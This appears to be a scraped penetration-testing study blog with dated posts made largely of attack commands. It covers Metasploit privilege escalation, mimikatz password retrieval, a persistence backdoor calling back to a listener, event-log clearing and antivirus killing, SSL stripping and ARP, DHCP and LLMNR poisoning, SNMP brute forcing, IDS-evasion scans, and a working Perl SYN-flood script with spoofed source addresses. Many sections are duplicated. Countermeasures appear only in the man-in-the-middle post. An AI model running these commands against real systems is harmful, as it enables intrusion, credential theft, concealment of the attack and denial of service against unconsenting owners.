meterpreter > getsystem
Failed....
meterpreter > backgroup
msf > use exploit/windows/local/bypassuac
msf > set session X
msf > run
meterpreter > getsystem
Successful...
Friday, July 31, 2020
[ICSI_CPT]Check Windows Patches and Updates
Check the status of system patches and updates via CMD command:
cmd > wmic qfe get Caption,Description,HotFixID,InstalledOn
Thursday, July 30, 2020
[eCPPT]Search sub-domains of a Top Level Domain
1) Google:
site:microsoft.com
2) Zone Transfer:
# host -l microsoft.com soa.microsoft.com
3) Shodan & Censys:
Shodan: search microsoft.com
Censys: search certificates related to microsoft.com
4) DNS Enumeration:
# dnsenum microsoft.com
# dnsrecon -d microsoft.com
# fierce -dns microsoft.com
Wednesday, July 29, 2020
[eCPPT]Detect Web services and their versions
1) whatweb
# whatweb http://www.microsoft.com/
# whatweb -v http://www.microsoft.com/
2) wappalyzer
It is an extension being able to be installed on FireFox and Chrome.
# whatweb http://www.microsoft.com/
# whatweb -v http://www.microsoft.com/
2) wappalyzer
It is an extension being able to be installed on FireFox and Chrome.
Sunday, July 26, 2020
[eCPPT][ICSI_CPT][Metasploit]Metasploit Cheat Sheet
Boot up Msfconsole:
# service postgresql start
# msfdb init
# msfconsole
msf > db_status
Search appropriate modules (some examples):
msf > search platform:Windows
msf > search platform:"Windows 7"
msf > search name:mysql
msf > search path:scada
msf > search author:jsmith
msf > search cve:2010-0249
msf > search cve:2011 author:jsmith platform:linux
Exploitation Procedure:
search -> use -> show options -> set -> show payloads -> set payload -> run
Migrate the process within Meterpreter for a stable purpose(P.S.:Suppose the PID of davcdata.exe is 2732):
meterpreter > ps
...
2660 1456 w3wp.exe x86 0 NT AUTHORITY\NETWORK SERVICE c:\windows\system32\inetsrv\w3wp.exe
2732 604 davcdata.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\inetsrv\davcdata.exe
meterpreter > migrate 2732
[*] Migrating from 1980 to 2732...
[*] Migration completed successfully.
A simple trial for privilege escalation(P.S.: for Windows victims only):
meterpreter > getsystem
Find appropriate privilege escalation exploits(P.S.:Suppose the existing session is 1):
meterpreter > background
msf > search local_exploit
msf > use 0
msf > set session 1
msf > run
Privilege Escalation within Meterpreter(P.S.:Suppose MS10-015 vulnerability is applied and the existing session is 2):
meterpreter > cd %TEMP%
meterpreter > background
msf > use exploit/windows/local/ms10_015_kitrap0d
msf > set session 2
msf > set lhost 10.10.XX.XX
msf > run
msf > sessions -i 2
Retrieve passwords via Meterpreter:
meterpreter > load mimikatz
meterpreter > mimikatz_command -f sekurlsa::searchPassword
meterpreter > kerberos
Install a backdoor agent via Meterpreter for a persistent access:
Clean Windows Event Logs through Meterpreter:
meterpreter > clearev
Post-exploitation commands(for Windows):
meterpreter > sysinfo
meterpreter > getuid
meterpreter > run post/windows/manage/migrate NAME=explorer.exe
meterpreter > run post/windows/manage/killav
meterpreter > run post/windows/gather/checkvm
meterpreter > run post/windows/manage/autoroute
# service postgresql start
# msfdb init
# msfconsole
msf > db_status
Search appropriate modules (some examples):
msf > search platform:Windows
msf > search platform:"Windows 7"
msf > search name:mysql
msf > search path:scada
msf > search author:jsmith
msf > search cve:2010-0249
msf > search cve:2011 author:jsmith platform:linux
Exploitation Procedure:
search -> use -> show options -> set -> show payloads -> set payload -> run
Migrate the process within Meterpreter for a stable purpose(P.S.:Suppose the PID of davcdata.exe is 2732):
meterpreter > ps
...
2660 1456 w3wp.exe x86 0 NT AUTHORITY\NETWORK SERVICE c:\windows\system32\inetsrv\w3wp.exe
2732 604 davcdata.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\inetsrv\davcdata.exe
meterpreter > migrate 2732
[*] Migrating from 1980 to 2732...
[*] Migration completed successfully.
A simple trial for privilege escalation(P.S.: for Windows victims only):
meterpreter > getsystem
Find appropriate privilege escalation exploits(P.S.:Suppose the existing session is 1):
meterpreter > background
msf > search local_exploit
msf > use 0
msf > set session 1
msf > run
Privilege Escalation within Meterpreter(P.S.:Suppose MS10-015 vulnerability is applied and the existing session is 2):
meterpreter > cd %TEMP%
meterpreter > background
msf > use exploit/windows/local/ms10_015_kitrap0d
msf > set session 2
msf > set lhost 10.10.XX.XX
msf > run
msf > sessions -i 2
Retrieve passwords via Meterpreter:
meterpreter > load mimikatz
meterpreter > mimikatz_command -f sekurlsa::searchPassword
meterpreter > kerberos
Install a backdoor agent via Meterpreter for a persistent access:
meterpreter > run persistence -U -i 5 -p 443 -r 192.168.0.224
Among others, "-U" represents the automatic execution of the backdoor agent, "-i 5" stands for an attempt to connect the backdoor server every 5 seconds if the connection fails, "-p 443" defines TCP443 as the remote port listening on the backdoor server, and "-r 192.168.0.224" specifies the IP address of the backdoor server, which is 192.168.0.224 in this case.
meterpreter > clearev
Post-exploitation commands(for Windows):
meterpreter > sysinfo
meterpreter > getuid
meterpreter > run post/windows/manage/migrate NAME=explorer.exe
meterpreter > run post/windows/manage/killav
meterpreter > run post/windows/gather/checkvm
meterpreter > run post/windows/manage/autoroute
meterpreter > run post/windows/gather/enum_applications
meterpreter > run post/windows/gather/enum_ie
meterpreter > run post/windows/gather/hashdump
meterpreter > run post/windows/gather/enum_logged_on_users
meterpreter > run post/windows/gather/credentials/credentials_collector
meterpreter > run post/windows/gather/screen_spy
meterpreter > run post/windows/gather/enum_domain
meterpreter > run post/windows/gather/win_privs
meterpreter > run post/windows/gather/usb_history
meterpreter > run post/multi/recon/local_exploit_suggester
Post-exploitation commands(for Linux):
meterpreter > sysinfo
meterpreter > run post/linux/gather/enum_configs
meterpreter > run post/linux/gather/enum_system
meterpreter > run post/linux/gather/enum_users_history
meterpreter > run post/multi/recon/local_exploit_suggester
AutoRun Post-exploitation commands:
1) Save the commands above into a rc file located at /root/autorun.rc
2) Enter the handler view, specify the corresponding options, and execute the following command:
msf handler > set AutoRunScript multi_console_command -rc /root/autorun.rc
msf handler > run
meterpreter > run post/windows/gather/enum_ie
meterpreter > run post/windows/gather/hashdump
meterpreter > run post/windows/gather/enum_logged_on_users
meterpreter > run post/windows/gather/credentials/credentials_collector
meterpreter > run post/windows/gather/screen_spy
meterpreter > run post/windows/gather/enum_domain
meterpreter > run post/windows/gather/win_privs
meterpreter > run post/windows/gather/usb_history
meterpreter > run post/multi/recon/local_exploit_suggester
Post-exploitation commands(for Linux):
meterpreter > sysinfo
meterpreter > run post/linux/gather/enum_configs
meterpreter > run post/linux/gather/enum_system
meterpreter > run post/linux/gather/enum_users_history
meterpreter > run post/multi/recon/local_exploit_suggester
AutoRun Post-exploitation commands:
1) Save the commands above into a rc file located at /root/autorun.rc
2) Enter the handler view, specify the corresponding options, and execute the following command:
msf handler > set AutoRunScript multi_console_command -rc /root/autorun.rc
msf handler > run
Post-exploitation for further exploration:
1) ARP Scan (PS: suppose the target network is 10.32.120.0/24):
meterpreter > run arp_scanner -r 10.32.120.0/24
2) Make the compromised PC as a router/jumpbox (PS: suppose the target network is 192.168.2.0/24, and the meterpreter session id is 1):
meterpreter > background
msf > route add 192.168.2.0 255.255.255.0 1
The updated routing table can be confirmed by executing the following command:
msf > route print
The target network can be scanned through the jumpbox now by executing the commands below:
msf > use auxiliary/scanner/portscan/tcp
msf > set RHOSTS 192.168.2.1
msf > set PORTS 1-1024
msf > run
Friday, July 24, 2020
Convert XML to HTML by xsltproc
# nmap -A 192.168.0.251 -oX ./scan.xml
# xsltproc ./scan.xml -o ./scan.html
# xsltproc ./scan.xml -o ./scan.html
Thursday, July 23, 2020
[ICSI_CPT] Host Discovery
Passive Discovery:
# netdiscover -p
Active Discovery:
# netdiscover -r 192.168.1.0/24
# nmap -sP 192.168.1.0/24
# netdiscover -p
Active Discovery:
# netdiscover -r 192.168.1.0/24
# nmap -sP 192.168.1.0/24
[ICSI_CPT][DNS] DNS Discovery
# host -l microsoft.com soa.microsoft.com
# dnsenum microsoft.com
# dnsrecon -d microsoft.com
# dnsenum microsoft.com
# dnsrecon -d microsoft.com
[ICSI_CPT][eCPPT][Threat Intelligence] Shodan Hacking
Reference: https://developer.shodan.io/api
Update Date: July 23, 2020
data:
OLD IIS
"iis/5.0"
microsoft.com
city:
city:London
city:Singapore
country:
country:SG
country:US
geo [An example below: Devices within a 50km radius of San Diego (32.8,-117)]:
geo:32.8,-117,50
hostname:
hostname:test
net:
net:216.219.0.0/16
ip:
ip:8.8.4.4
ip:1.1.1.1
os:
os:windows
os:"windows 2003"
port:
port:445
port:135
before/after [An example below: Apache servers sitting in China and appearing during between March 22, 2010 and June 4, 2010]:
apache country:CN after:22/03/2010 before:04/06/2010
device:
device:router
device:webcam
Update Date: July 23, 2020
data:
OLD IIS
"iis/5.0"
microsoft.com
city:
city:London
city:Singapore
country:
country:SG
country:US
geo [An example below: Devices within a 50km radius of San Diego (32.8,-117)]:
geo:32.8,-117,50
hostname:
hostname:test
net:
net:216.219.0.0/16
ip:
ip:8.8.4.4
ip:1.1.1.1
os:
os:windows
os:"windows 2003"
port:
port:445
port:135
before/after [An example below: Apache servers sitting in China and appearing during between March 22, 2010 and June 4, 2010]:
apache country:CN after:22/03/2010 before:04/06/2010
device:
device:router
device:webcam
Sunday, July 19, 2020
OS Configuration Security Review | Local Vulnerability Scan
[Windows:]
Policy Analyzer (Microsoft Security Compliance Toolkit)
https://www.microsoft.com/en-us/download/details.aspx?id=55319
Microsoft Baseline Security Analyzer (MBSA)
https://www.microsoft.com/en-us/download/details.aspx?id=19892
[Linux:]
OpenSCAP
https://www.open-scap.org/
Lynis
https://cisofy.com/lynis/
Policy Analyzer (Microsoft Security Compliance Toolkit)
https://www.microsoft.com/en-us/download/details.aspx?id=55319
Microsoft Baseline Security Analyzer (MBSA)
https://www.microsoft.com/en-us/download/details.aspx?id=19892
[Linux:]
OpenSCAP
https://www.open-scap.org/
Lynis
https://cisofy.com/lynis/
Saturday, July 18, 2020
[eCPPT][SSL][MITM] SSL Strip Attack
Comment: The following experimentation works well with Kali 2018.1. The reason why I don't use the newest version, namely 2020.X, is because the newest version has no sslstrip by default, and is tough to install python-twisted-web, which is required by sslstrip.
Running (In this case, 192.168.0.19 is the victim, 192.168.0.1 is the gateway, and TCP8080 is the listening port) :
# sysctl net.ipv4.ip_forward=1
# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
# sslstrip -a -f -l 8080 -w /root/sslstrip.log
Open a new terminal and type:
# arpspoof -i eth0 -t 192.168.0.19 -r 192.168.0.1
Harvest:
Open a new terminal and type:
# tail -n 30 -f /root/sslstrip.log
P.S.: This experimentation only succeeds when the victim's browser does not support HSTS.
Running (In this case, 192.168.0.19 is the victim, 192.168.0.1 is the gateway, and TCP8080 is the listening port) :
# sysctl net.ipv4.ip_forward=1
# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
# sslstrip -a -f -l 8080 -w /root/sslstrip.log
Open a new terminal and type:
# arpspoof -i eth0 -t 192.168.0.19 -r 192.168.0.1
Harvest:
Open a new terminal and type:
# tail -n 30 -f /root/sslstrip.log
P.S.: This experimentation only succeeds when the victim's browser does not support HSTS.
Friday, July 17, 2020
[eCPPT][MITM]Bettercap to lauch ARP POISONING
Installation:
# apt-get update
# apt-get install bettercap
Execution:
# sysctl net.ipv4.ip_forward=1
# bettercap -iface wlan0
Tweaking:
The help command would show the status of modules:
>> help
Leverage "MODULE_NAME on/off" to turn on or shut down specific module:
>> arp.spoof on
>> net.sniff off
ARP Poisoning:
>> net.recon on
>> net.sniff on
>> arp.spoof on
# apt-get update
# apt-get install bettercap
Execution:
# sysctl net.ipv4.ip_forward=1
# bettercap -iface wlan0
Tweaking:
The help command would show the status of modules:
>> help
Leverage "MODULE_NAME on/off" to turn on or shut down specific module:
>> arp.spoof on
>> net.sniff off
ARP Poisoning:
>> net.recon on
>> net.sniff on
>> arp.spoof on
Thursday, July 16, 2020
[eCPPT][MITM][Spoofing][Poisoning]LAN-Based Man In The Middle Attacks
1) MAC Flooding
Currently, most switches each can store 100,000,000 MAC addresses. As such, the following command can stuff the CAM table:
# sysctl net.ipv4.conf.all.forwarding=1
# macof -i eth0 -n 100000000
This attack is obsolete given that modern switches each can store a great quantity of MAC addresses.
Countermeasure:
- Port Security to limit the number of PCs connecting to each port
- IEEE 802.1x requiring connected PCs to forcibly authenticate their identities
- MAC Filtering only allowing authorized MAC addresses to communicate
2) ARP Poinsoning
In the scenario below, 192.168.0.1 is the gateway's IP address, and 192.168.0.7 is the victim's IP Address.
# sysctl net.ipv4.conf.all.forwarding=1
# arpspoof -i eth0 -t 192.168.0.7 -r 192.168.0.1
Then leverage WireShark to capture the confidential information.
More details can refer to the following two documents:
https://alexchaoyihuang.blogspot.com/2018/07/performing-arp-spoofingpoisoning-on.html
https://alexchaoyihuang.blogspot.com/2018/07/performing-arp-spoofingpoisoning-on_5.html
Countermeasure:
- Encryption In Transit and At Rest to withstand Man In The Middle and Interception
- Applying Static ARP to networks
- Leverage such integration solutions as CISCO DHCP Snooping and Dynamic ARP Inspection
3) DHCP Spoofing
Install Yersinia first:
# apt-get update
# apt-get install yersinia
Now start hacking:
# ifconfig eth0:1 192.168.1.1 netmask 255.255.255.0
# ifconfig eth0:1 up
# sysctl net.ipv4.ip_forward=1
Leverage the following steps to launch DHCP Starvation attack in order to exhaust the authorized DHCP server:
# yersinia -I
"i" -> Change to the network adapter "eth0" -> "q"
"F2" to change to DHCP mode
"x" -> "1"
And then start launching a rogue DHCP server:
"x" -> "2"
Fill out the following information before pressing the ENTER button to launch DHCP Spoofing attack:
Server ID: 192.168.001.001
Start IP: 192.168.001.100
End IP: 192.168.001.200
Lease Time (secs): 99999999
Renew Time (secs): 99999999
Subnet Mask: 255.255.255.000
Router: 192.168.001.001
DNS Server: 008.008.004.004
Domain: test.com
The next step is to allow the network created by the rogue DHCP server to access the legitimate networks by establishing a NAT rule, as shown below.
# iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
At the end, don't forget turning off the firewall if any.
Countermeasure:
- Give up DHCP and use static IP addresses instead
- Deploy NIDS-alike systems to monitor DHCP Starvation attack
4) LLMNR/NBT-NS Spoofing/Poisoning (Responder && MultiRelay)
Scenario #1:
When someone in the same WINDOWS domain makes a typo with an nonexistent hostname, the following command will capture the request, and respond with a fake response in order to gain the one's username and the hash of the one's password.
[Attacker Kali PC:]
# responder -I eth0
After gaining the username and hash:
# cd /usr/share/responder/logs
Apply john the ripper to the case as shown below:
# john ./SMB-NTLMv1-SSP-192.168.0.11.txt
Scenario #2:
If those PCs sitting in the WINDOWS network enable WPAD configuring proxy settings, the WPAD listener could be enabled to trick PCs' owners into typing their passwords, the attacker then can get the passwords without decrypting anything.
[Attacker Kali PC:]
# responder -I eth0 -wrFb
Scenario #3:
The Multi-Relay function of Responder could be applied when SMB Signing settings on the victim's PC is disabled.
[Attacker Kali PC:]
First determine if SMB Signing settings on the victim is disabled:
# /usr/share/responder/tools/RunFinger.py -i 192.168.0.11
After confirming that SMB Signing is disabled on the victim's PC, edit responder.conf and turn off SMB and HTTP services:
# vi /etc/responder/Responder.conf
SMB = Off
HTTP = Off
:wq
# responder -I eth0 --lm
The following command can help get a shell directly:
# /usr/share/responder/tools/MultiRelay.py -t 192.168.0.11 –u ALL
Countermeasure:
- Enable SMB Signing
Currently, most switches each can store 100,000,000 MAC addresses. As such, the following command can stuff the CAM table:
# sysctl net.ipv4.conf.all.forwarding=1
# macof -i eth0 -n 100000000
This attack is obsolete given that modern switches each can store a great quantity of MAC addresses.
Countermeasure:
- Port Security to limit the number of PCs connecting to each port
- IEEE 802.1x requiring connected PCs to forcibly authenticate their identities
- MAC Filtering only allowing authorized MAC addresses to communicate
2) ARP Poinsoning
In the scenario below, 192.168.0.1 is the gateway's IP address, and 192.168.0.7 is the victim's IP Address.
# sysctl net.ipv4.conf.all.forwarding=1
# arpspoof -i eth0 -t 192.168.0.7 -r 192.168.0.1
Then leverage WireShark to capture the confidential information.
More details can refer to the following two documents:
https://alexchaoyihuang.blogspot.com/2018/07/performing-arp-spoofingpoisoning-on.html
https://alexchaoyihuang.blogspot.com/2018/07/performing-arp-spoofingpoisoning-on_5.html
Countermeasure:
- Encryption In Transit and At Rest to withstand Man In The Middle and Interception
- Applying Static ARP to networks
- Leverage such integration solutions as CISCO DHCP Snooping and Dynamic ARP Inspection
3) DHCP Spoofing
Install Yersinia first:
# apt-get update
# apt-get install yersinia
Now start hacking:
# ifconfig eth0:1 192.168.1.1 netmask 255.255.255.0
# ifconfig eth0:1 up
# sysctl net.ipv4.ip_forward=1
Leverage the following steps to launch DHCP Starvation attack in order to exhaust the authorized DHCP server:
# yersinia -I
"i" -> Change to the network adapter "eth0" -> "q"
"F2" to change to DHCP mode
"x" -> "1"
And then start launching a rogue DHCP server:
"x" -> "2"
Fill out the following information before pressing the ENTER button to launch DHCP Spoofing attack:
Server ID: 192.168.001.001
Start IP: 192.168.001.100
End IP: 192.168.001.200
Lease Time (secs): 99999999
Renew Time (secs): 99999999
Subnet Mask: 255.255.255.000
Router: 192.168.001.001
DNS Server: 008.008.004.004
Domain: test.com
The next step is to allow the network created by the rogue DHCP server to access the legitimate networks by establishing a NAT rule, as shown below.
# iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
At the end, don't forget turning off the firewall if any.
Countermeasure:
- Give up DHCP and use static IP addresses instead
- Deploy NIDS-alike systems to monitor DHCP Starvation attack
4) LLMNR/NBT-NS Spoofing/Poisoning (Responder && MultiRelay)
Scenario #1:
When someone in the same WINDOWS domain makes a typo with an nonexistent hostname, the following command will capture the request, and respond with a fake response in order to gain the one's username and the hash of the one's password.
[Attacker Kali PC:]
# responder -I eth0
After gaining the username and hash:
# cd /usr/share/responder/logs
Apply john the ripper to the case as shown below:
# john ./SMB-NTLMv1-SSP-192.168.0.11.txt
Scenario #2:
If those PCs sitting in the WINDOWS network enable WPAD configuring proxy settings, the WPAD listener could be enabled to trick PCs' owners into typing their passwords, the attacker then can get the passwords without decrypting anything.
[Attacker Kali PC:]
# responder -I eth0 -wrFb
Scenario #3:
The Multi-Relay function of Responder could be applied when SMB Signing settings on the victim's PC is disabled.
[Attacker Kali PC:]
First determine if SMB Signing settings on the victim is disabled:
# /usr/share/responder/tools/RunFinger.py -i 192.168.0.11
After confirming that SMB Signing is disabled on the victim's PC, edit responder.conf and turn off SMB and HTTP services:
# vi /etc/responder/Responder.conf
SMB = Off
HTTP = Off
:wq
# responder -I eth0 --lm
The following command can help get a shell directly:
# /usr/share/responder/tools/MultiRelay.py -t 192.168.0.11 –u ALL
Countermeasure:
- Enable SMB Signing
Friday, July 10, 2020
[eCPPT][snmp]SNMP Hacking
[Server:]
For the server side, install a SNMPd through Docker:
# /etc/init.d/docker start
# docker run -d --name snmpd -p 161:161/udp polinux/snmpd
[Hacker:]
Confirm if the remote SNMP is working properly:
# nmap -sU -sV -n -p 161 192.168.0.253
Check what NMAP scripts could be used to get further information:
# ll /usr/share/nmap/scripts/|grep snmp
-rw-r--r-- 1 root root 7501 Mar 10 12:52 snmp-brute.nse
-rw-r--r-- 1 root root 4375 Mar 10 12:52 snmp-hh3c-logins.nse
-rw-r--r-- 1 root root 5216 Mar 10 12:52 snmp-info.nse
-rw-r--r-- 1 root root 28629 Mar 10 12:52 snmp-interfaces.nse
-rw-r--r-- 1 root root 5965 Mar 10 12:52 snmp-ios-config.nse
-rw-r--r-- 1 root root 4143 Mar 10 12:52 snmp-netstat.nse
-rw-r--r-- 1 root root 4418 Mar 10 12:52 snmp-processes.nse
-rw-r--r-- 1 root root 1854 Mar 10 12:52 snmp-sysdescr.nse
-rw-r--r-- 1 root root 2557 Mar 10 12:52 snmp-win32-services.nse
-rw-r--r-- 1 root root 2726 Mar 10 12:52 snmp-win32-shares.nse
-rw-r--r-- 1 root root 4700 Mar 10 12:52 snmp-win32-software.nse
-rw-r--r-- 1 root root 2003 Mar 10 12:52 snmp-win32-users.nse
Brute Force the community strings:
# nmap -sU -p 161 --script=snmp-brute.nse --script-args=snmp-brute.communitiesdb=/usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt 192.168.0.253
# hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt snmp://192.168.0.253
Take a chance to try the community string, "public", by using SNMP Walking:
# snmpwalk -v 2c 192.168.0.253 -c public
More clearly understand the target's settings via SNMP:
# snmp-check 192.168.0.253 -c public
Check an OID and modify it:
# snmpwalk -v 2c 192.168.0.253 -c public .iso.3.6.1.2.1.1.9.1.3.1
iso.3.6.1.2.1.1.9.1.3.1 = STRING: "The MIB for Message Processing and Dispatching."
# snmpset -v 2c -c private 192.168.0.253 .iso.3.6.1.2.1.1.9.1.3.1 s "Test"
For the server side, install a SNMPd through Docker:
# /etc/init.d/docker start
# docker run -d --name snmpd -p 161:161/udp polinux/snmpd
[Hacker:]
Confirm if the remote SNMP is working properly:
# nmap -sU -sV -n -p 161 192.168.0.253
Check what NMAP scripts could be used to get further information:
# ll /usr/share/nmap/scripts/|grep snmp
-rw-r--r-- 1 root root 7501 Mar 10 12:52 snmp-brute.nse
-rw-r--r-- 1 root root 4375 Mar 10 12:52 snmp-hh3c-logins.nse
-rw-r--r-- 1 root root 5216 Mar 10 12:52 snmp-info.nse
-rw-r--r-- 1 root root 28629 Mar 10 12:52 snmp-interfaces.nse
-rw-r--r-- 1 root root 5965 Mar 10 12:52 snmp-ios-config.nse
-rw-r--r-- 1 root root 4143 Mar 10 12:52 snmp-netstat.nse
-rw-r--r-- 1 root root 4418 Mar 10 12:52 snmp-processes.nse
-rw-r--r-- 1 root root 1854 Mar 10 12:52 snmp-sysdescr.nse
-rw-r--r-- 1 root root 2557 Mar 10 12:52 snmp-win32-services.nse
-rw-r--r-- 1 root root 2726 Mar 10 12:52 snmp-win32-shares.nse
-rw-r--r-- 1 root root 4700 Mar 10 12:52 snmp-win32-software.nse
-rw-r--r-- 1 root root 2003 Mar 10 12:52 snmp-win32-users.nse
Brute Force the community strings:
# nmap -sU -p 161 --script=snmp-brute.nse --script-args=snmp-brute.communitiesdb=/usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt 192.168.0.253
# hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt snmp://192.168.0.253
Take a chance to try the community string, "public", by using SNMP Walking:
# snmpwalk -v 2c 192.168.0.253 -c public
More clearly understand the target's settings via SNMP:
# snmp-check 192.168.0.253 -c public
Check an OID and modify it:
# snmpwalk -v 2c 192.168.0.253 -c public .iso.3.6.1.2.1.1.9.1.3.1
iso.3.6.1.2.1.1.9.1.3.1 = STRING: "The MIB for Message Processing and Dispatching."
# snmpset -v 2c -c private 192.168.0.253 .iso.3.6.1.2.1.1.9.1.3.1 s "Test"
Wednesday, July 8, 2020
[eCPPT]SMB and RPC enumeration and mounting
Enumeration:
#enum4linux 192.168.0.191
#nbtstat -v 192.168.0.191
#rpcclient -N -U "" 192.168.0.191
Mount share drives:
#mount.cifs //192.168.0.191/C /media/C_share/ user=,pass=
#smbclient \\\\192.168.0.191\\C "welcome20XX" -U "TempUser"
#enum4linux 192.168.0.191
#nbtstat -v 192.168.0.191
#rpcclient -N -U "" 192.168.0.191
Mount share drives:
#mount.cifs //192.168.0.191/C /media/C_share/ user=,pass=
#smbclient \\\\192.168.0.191\\C "welcome20XX" -U "TempUser"
Audit Linux command line
1) The script and scriptplay commands
tecmint@tecmint ~ $ script --timing=time.txt script.log
Script started, file is script.txt
tecmint@tecmint ~ $ exit
Script done, file is script.txt
tecmint@tecmint ~ $ scriptreplay --timing=time.txt script.log
2) The trap command:
$ trap 'echo "$USER":"$BASH_COMMAND" >>/path/to/log' DEBUG
$ uname
Linux
$ pwd
/home/dessert
$ hostname
dessert’s plowhorse
$ ls
dir1 file1 file2
$
$
$ bahs
No command 'bahs' found, did you mean:
Command 'bash' from package 'bash' (main)
Command 'bats' from package 'bats' (universe)
bahs: command not found
$ cat /path/to/log
dessert:uname
dessert:pwd
dessert:hostname
dessert:ls --color=auto
dessert:bahs
dessert:cat /path/to/log
tecmint@tecmint ~ $ script --timing=time.txt script.log
Script started, file is script.txt
tecmint@tecmint ~ $ exit
Script done, file is script.txt
tecmint@tecmint ~ $ scriptreplay --timing=time.txt script.log
2) The trap command:
$ trap 'echo "$USER":"$BASH_COMMAND" >>/path/to/log' DEBUG
$ uname
Linux
$ pwd
/home/dessert
$ hostname
dessert’s plowhorse
$ ls
dir1 file1 file2
$
$
$ bahs
No command 'bahs' found, did you mean:
Command 'bash' from package 'bash' (main)
Command 'bats' from package 'bats' (universe)
bahs: command not found
$ cat /path/to/log
dessert:uname
dessert:pwd
dessert:hostname
dessert:ls --color=auto
dessert:bahs
dessert:cat /path/to/log
Monday, July 6, 2020
[eCPPT][nmap]Scanning techniques for Firwall/IDS Evasion
1) Fragmentation
Utilize the parameters "-sS -f", such as:
#nmap -sS -f 192.168.0.1
This technique is obsoleted given that nearly all modern NIDSs can detect this kind of scanning.
2) Decoy
Use the parameters, "-sS -D", to make a couple of bogus IP addresses as fake scanners to confuse security anaylsts.
#nmap -sS -D 192.168.0.3,192.168.0.5,192.168.0.7,ME,192.168.0.11 192.168.0.251
3) Prolong the interval among scan requests
Apply "-T0" (5 minutes) or "-T1" (15 seconds) to the scan in order to hide the scanning activities.
#nmap -sS -p 25,80,443 -T0 192.168.0.1
4) Set Scanning Source Port as Famous Service Port
Change the source port of those scanning probes to a famous service port (e.g. 25, 80, or 443) by using a parameter, "-g".
#nmap -sS -g 25 192.168.0.1
#nmap -sU -g 53 192.168.0.251
5) Idle Scan
Utilize a zombie to scan a targeting host through leveraging a parameter, "-sI".
First, determine if a host (i.e. 192.168.0.251) can be a zombie:
#nmap -O -v -n 192.168.0.251
Second, if the zombie host is confirmed to be available, use it to scan the targeting host (i.e. 192.168.0.253):
#nmap -p22 -sI 192.168.0.251:443 192.168.0.253
Utilize the parameters "-sS -f", such as:
#nmap -sS -f 192.168.0.1
This technique is obsoleted given that nearly all modern NIDSs can detect this kind of scanning.
2) Decoy
Use the parameters, "-sS -D", to make a couple of bogus IP addresses as fake scanners to confuse security anaylsts.
#nmap -sS -D 192.168.0.3,192.168.0.5,192.168.0.7,ME,192.168.0.11 192.168.0.251
3) Prolong the interval among scan requests
Apply "-T0" (5 minutes) or "-T1" (15 seconds) to the scan in order to hide the scanning activities.
#nmap -sS -p 25,80,443 -T0 192.168.0.1
4) Set Scanning Source Port as Famous Service Port
Change the source port of those scanning probes to a famous service port (e.g. 25, 80, or 443) by using a parameter, "-g".
#nmap -sS -g 25 192.168.0.1
#nmap -sU -g 53 192.168.0.251
5) Idle Scan
Utilize a zombie to scan a targeting host through leveraging a parameter, "-sI".
First, determine if a host (i.e. 192.168.0.251) can be a zombie:
#nmap -O -v -n 192.168.0.251
Second, if the zombie host is confirmed to be available, use it to scan the targeting host (i.e. 192.168.0.253):
#nmap -p22 -sI 192.168.0.251:443 192.168.0.253
Saturday, July 4, 2020
[nmap]syn_flood_through_nmap.pl
#!/usr/bin/perl -w
$|=1;
sub randomip(){
@digits = ();
for (0..3) {
push @digits, int (rand (255) + 1);
}
return join '.', @digits;
}
#print randomip(); #DEBUG
sub check_nmap(){
$result = sprintf(`which nmap`);
if(length($result)==0){
die "Please install Nmap.\n";
}
return;
}
&check_nmap();
print("Target IP address (e.g. 192.168.0.1): ");
$target_ip=<STDIN>;
chop($target_ip);
print("Target TCP port (e.g. 25): ");
$target_port=<STDIN>;
chop($target_port);
print("Network Interface sending out SYN (e.g. eth0): ");
$network_adapter=<STDIN>;
chop($network_adapter);
print("Launching SYN Flood...");
while(1){
$src_ip = &randomip();
system("nmap -e $network_adapter -Pn -sS -T5 -p $target_port -S $src_ip $target_ip");
}
exit(1);
$|=1;
sub randomip(){
@digits = ();
for (0..3) {
push @digits, int (rand (255) + 1);
}
return join '.', @digits;
}
#print randomip(); #DEBUG
sub check_nmap(){
$result = sprintf(`which nmap`);
if(length($result)==0){
die "Please install Nmap.\n";
}
return;
}
&check_nmap();
print("Target IP address (e.g. 192.168.0.1): ");
$target_ip=<STDIN>;
chop($target_ip);
print("Target TCP port (e.g. 25): ");
$target_port=<STDIN>;
chop($target_port);
print("Network Interface sending out SYN (e.g. eth0): ");
$network_adapter=<STDIN>;
chop($network_adapter);
print("Launching SYN Flood...");
while(1){
$src_ip = &randomip();
system("nmap -e $network_adapter -Pn -sS -T5 -p $target_port -S $src_ip $target_ip");
}
exit(1);
Friday, July 3, 2020
[nmap]Show Packet Tracking information of Nmap scanning
Use the parameter, --packet-trace, as shown below:
# nmap -sS -T4 --packet-trace 8.8.4.4
# nmap -sS -T4 --packet-trace 8.8.4.4
Thursday, July 2, 2020
[eCPPT][nmap]Confirm if a remote machine can be used as a zombie
#nmap -O -v -n 192.168.0.1
Below shows that the aforementioned machine can be a zombie for Nmap's Idle Scan:
IP ID Sequence Generation: Incremental
OR (when you have already known which remote TCP port is open, such as TCP135 in the following example):
#nmap -O -v -n 135 10.50.97.10
Below shows that the aforementioned machine can be a zombie for Nmap's Idle Scan:
IP ID Sequence Generation: Incremental
Subscribe to:
Posts (Atom)